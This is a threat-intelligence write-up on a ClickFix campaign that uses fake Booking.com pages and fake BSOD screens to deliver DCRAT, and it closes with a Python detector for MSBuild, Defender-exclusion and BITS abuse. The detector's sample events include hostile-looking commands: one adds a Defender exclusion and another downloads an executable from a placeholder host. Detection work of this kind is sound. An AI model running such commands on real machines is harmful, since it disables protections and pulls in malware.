ClickFix Campaign: Fake BSOD Screens Deliver DCRAT Malware

A newly uncovered ClickFix social engineering campaign is targeting the hospitality sector in Europe, tricking victims with fake Windows Blue Screen of Death (BSOD) screens to manually execute malware.

Attack Overview

  • Campaign name: PHALT#BLYX (tracked by Securonix).
  • Initial lure: Phishing emails impersonating Booking.com, claiming large reservation cancellations/refunds.
  • Landing page: High-fidelity clone of Booking.com hosted on low-house[.]com.
  • Deception flow:
    1. Victim clicks link → fake Booking.com site.
    2. Site displays “Loading is taking too long” error.
    3. Clicking refresh → browser enters full-screen → fake BSOD screen.
    4. BSOD instructs victim to open Run dialog and paste malicious command.

Technical Details

  • Malicious command: PowerShell script that:
    • Opens a decoy Booking.com admin page.
    • Downloads a malicious .NET project (v.proj).
    • Compiles it using legitimate MSBuild.exe.
  • Payload:
    • Adds Windows Defender exclusions.
    • Triggers UAC prompts for admin rights.
    • Uses BITS (Background Intelligent Transfer Service) to fetch loader.
    • Establishes persistence via .url file in Startup folder.
  • Malware deployed: DCRAT (Remote Access Trojan).
    • Injected into aspnet_compiler.exe via process hollowing.
    • Executes in memory for stealth.

DCRAT Capabilities

  • Remote desktop access.
  • Keylogging.
  • Reverse shell.
  • In-memory execution of additional payloads.
  • Observed payload: cryptocurrency miner.

Impact

  • Foothold on networks: Attackers gain remote access to infected systems.
  • Lateral movement: Potential spread to other devices in the hospitality environment.
  • Data theft: Ability to exfiltrate sensitive information.
  • Operational disruption: Hotels and hospitality firms face reputational and financial risks.

Defensive Measures

  • For organizations:
    • Train staff to recognize fake BSODs and phishing emails.
    • Block suspicious domains (low-house[.]com).
    • Monitor for unusual MSBuild.exe activity.
    • Restrict PowerShell execution policies.
    • Harden endpoint defenses against process hollowing and BITS abuse.
  • For individuals:
    • Remember: real BSODs never provide recovery instructions.
    • Never paste or run commands from untrusted sources.
    • Keep Windows Defender and AV solutions updated.
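As an added example (not from the Securonix report or this article), the detection logic below turns the monitoring advice above into rules and runs them over constructed process-creation records: a script host launching MSBuild.exe on a .proj file in a user-writable path, aspnet_compiler.exe spawned by MSBuild, a Defender exclusion being added, and a BITS transfer. The record format, file paths, URL and rule names are assumptions, not real telemetry or the campaign's actual values.

```python
import re

# Constructed process-creation events (not real telemetry) in a simplified
# "Field=value|Field=value" form; field names mirror Sysmon Event ID 1.
SAMPLE_EVENTS = [
    # benign developer build from a source tree, launched from Explorer
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Program Files\MSBuild\MSBuild.exe|CommandLine=MSBuild.exe C:\src\app\app.csproj",
    # PowerShell handing a .proj in a user-writable path to MSBuild (the chain described above)
    r"ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe|CommandLine=MSBuild.exe C:\Users\Public\v.proj",
    # MSBuild spawning aspnet_compiler.exe, the hollowing target named in the article
    r"ParentImage=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe|Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe|CommandLine=aspnet_compiler.exe",
    # Defender exclusion being added from a script
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -c Add-MpPreference -ExclusionPath C:\Users\Public",
    # BITS used from PowerShell to fetch a file into a user-writable path (placeholder URL)
    r"ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell Start-BitsTransfer -Source http://example.invalid/l -Destination C:\Users\Public\l.exe",
]

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
USER_WRITABLE = re.compile(r"\\(Temp|AppData|Users\\Public|ProgramData)\\", re.IGNORECASE)

def parse_event(line):
    """Split one 'Field=value|...' record into a dict (values never contain '|')."""
    return dict(part.split("=", 1) for part in line.split("|"))

def detect(event):
    """Return the rule names the event trips (empty for benign activity)."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    hits = []
    if image.endswith("msbuild.exe") and parent.endswith(SCRIPT_HOSTS):
        hits.append("msbuild-from-script-host")
    if image.endswith("msbuild.exe") and re.search(r"\.\w*proj\b", cmd, re.I) and USER_WRITABLE.search(cmd):
        hits.append("msbuild-proj-in-user-writable-path")
    if image.endswith("aspnet_compiler.exe") and parent.endswith("msbuild.exe"):
        hits.append("aspnet_compiler-child-of-msbuild")
    if re.search(r"Add-MpPreference\b.*-Exclusion", cmd, re.I):
        hits.append("defender-exclusion-added")
    if image.endswith("bitsadmin.exe") or re.search(r"Start-BitsTransfer\b", cmd, re.I):
        hits.append("bits-transfer")
    return hits

def scan(lines):
    """Return (record index, rule name) pairs for every rule hit across the log."""
    return [(i, hit) for i, line in enumerate(lines) for hit in detect(parse_event(line))]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The benign build in the first record trips nothing because the project file sits outside the user-writable paths and the parent is not a script host; tune SCRIPT_HOSTS and USER_WRITABLE to your own build servers before deploying the rules.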

Takeaway

ClickFix demonstrates how attackers weaponize trust in familiar error screens to bypass user skepticism. By combining phishing, fake BSODs, and living-off-the-land binaries (MSBuild, BITS), adversaries deliver powerful RATs like DCRAT with stealth and persistence.
